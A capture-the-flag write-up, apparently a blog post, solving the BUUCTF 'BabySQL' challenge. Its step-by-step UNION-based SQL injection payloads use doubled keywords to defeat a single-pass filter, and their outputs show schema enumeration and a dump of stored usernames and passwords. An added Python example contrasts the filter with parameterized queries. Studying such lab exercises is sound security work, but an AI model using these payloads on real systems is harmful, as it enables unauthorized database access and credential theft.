[BUUCTF] [Geek Challenge 2019] BabySQL writeup, with a clear and easy-to-understand summary

0x00 Key points

SQL injection: double-write bypass

The application runs a replace function that finds union, select, etc. and replaces them with an empty string.

Because each keyword is only removed once, it can be bypassed by double writing: split the keyword in the middle and nest a complete copy of it inside, so that after one round of deletion a complete keyword is left behind:

union
ununionion

select
seselectlect

from
frfromom

where
whwhereere

information
infoorrmation
(because "or" is filtered)

order
oorrder
(because "or" is filtered)

by
bbyy
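To show why a single-pass replace fails and what the proper control looks like, here is an added Python example (not part of the original writeup or of the challenge's source): it models the filter as one case-insensitive replace per keyword, which is an assumption since the page does not show the filter code, shows how the doubled keywords collapse, and contrasts string concatenation with a parameterized query on a constructed in-memory SQLite table.

```python
import re
import sqlite3

# Keywords the challenge's filter strips (listed in the writeup). Modelling the
# filter as one case-insensitive "replace with empty" pass per keyword is an assumption.
BLACKLIST = ["union", "select", "from", "where", "or", "by"]

def weak_filter(value: str) -> str:
    """Single-pass deletion: each keyword is removed once, so a keyword nested
    inside itself ('ununionion') collapses back into the keyword."""
    for kw in BLACKLIST:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value

def filter_to_fixpoint(value: str) -> str:
    """Re-run the filter until nothing changes, so no nesting depth survives.
    Still a blacklist (it mangles legitimate words such as 'information'),
    so treat it as a detection aid, never as the sole control."""
    while (new := weak_filter(value)) != value:
        value = new
    return value

def build_vulnerable_sql(username: str, password: str) -> str:
    """Reconstruction of the vulnerable pattern (not the challenge's code):
    filtered input is concatenated into the query, so surviving keywords become SQL."""
    return ("SELECT username, password FROM users WHERE "
            f"username='{weak_filter(username)}' AND password='{weak_filter(password)}'")

def lookup_parameterized(conn, username: str, password: str):
    """The fix: bind values as parameters; the driver never parses them as SQL,
    so no keyword filtering is needed at all."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()

def demo() -> dict:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")  # constructed row
    payload = "pwd' ununionion seselectlect 1,2,3 #"  # the writeup's payload, URL-decoded
    return {
        "weak": weak_filter(payload),                    # "pwd' union select 1,2,3 #"
        "fixpoint": filter_to_fixpoint(payload),         # keywords gone
        "sql": build_vulnerable_sql("admin", payload),   # injected UNION reaches the DB
        "param": lookup_parameterized(conn, "admin", payload),      # None: no row matches
        "param_ok": lookup_parameterized(conn, "admin", "s3cret"),  # ('admin', 's3cret')
    }
```

Note that the filter-to-fixpoint variant only closes the nesting trick; a blacklist still breaks legitimate input, which is why parameterization is the real fix.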

Common URL encodings

%20
space

%23
#

%27
'

0x01 problem solving

?username=admin&password=pwd %27 or 1=1 %23

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1 ‘’ at line 1

The error shows only "1=1" with no "or" in front of it, so "or" is filtered.

?username=admin&password=pwd %27 oorr 1=1 %23

Hello admin!
Your password is ‘09e6f2bc1ee446ef66b91bf09f58d0d4’

"by" is also filtered, so both "or" and "by" in "order by" need double writing.

?username=admin&password=pwd %27 oorrder bbyy 3 %23

NO,Wrong username password!!!

?username=admin&password=pwd %27 oorrder bbyy 4 %23

Unknown column ‘4’ in ‘order clause’

So the query has three columns.

?username=admin&password=pwd ' union select 1 #

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1 ‘’ at line 1

The error only mentions "1 #", indicating that union and select were stripped.

Bypass them with double writing:

?username=admin&password=pwd ' ununionion seselectlect 1 #

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’ at line 1

Whether you use HackBar or the URL bar, the # here must be URL-encoded as %23, otherwise it won't work!
(I don't understand this very well; previously, using # in the URL bar was also fine???)

?username=admin&password=pwd %27 ununionion seselectlect 1 %23

The used SELECT statements have a different number of columns

Column count mismatch; try three columns.

?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23

Hello 2!
Your password is ‘3’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,version() %23

Hello 2!

Your password is ‘10.3.18-MariaDB’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23

Hello 2!
Your password is ‘geek’

Enumerate databases

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23

Hello 2!
Your password is
‘information_schema,mysql,performance_schema,test,ctf,geek’

Enumerate tables

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(table_name)from(information_schema.tables)whwhereere table_schema="geek" %23

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘(infinfmationmation_schema.tables)where table_schema=“geek” #’’ at line 1

"from" is filtered, and the "or" inside "information" is filtered too, so both need double writing.

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="geek" %23

Hello 2!

Your password is ‘b4bsql,geekuser’

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23

Hello 2!
Your password is ‘Flag’

Enumerate columns

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

Hello 2!
Your password is ‘flag’

Read the flag column of the Flag table in the ctf database:

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

Hello 2!
Your password is ‘flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’

Another approach

Enumerate tables (each table appears once per column in information_schema.columns, hence the duplicates; distinct removes them)

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23

Hello 2!
Your password is ‘b4bsql,b4bsql,b4bsql,geekuser,geekuser,geekuser’

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23

Hello 2!
Your password is ‘b4bsql,geekuser’

Enumerate columns

?username=admin&password=pwd  ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23

Hello 2!
Your password is ‘id,username,password’

?username=1&password=pwd' uniunionon selselectect 1,username,passwoorrd frfromom b4bsql %23

Hello cl4y!
Your password is ‘i_want_to_play_2077’

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23

Hello 2!
Your password is
‘1:cl4y:i_want_to_play_2077,2:sql:sql_injection_is_so_fun,3:porn:do_you_know_pornhub,4:git:github_is_different_from_pornhub,5:Stop:you_found_flag_so_stop,6:badguy:i_told_you_to_stop,7:hacker:hack_by_cl4y,8:flag:flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’

Origin blog.csdn.net/vanarrow/article/details/108226003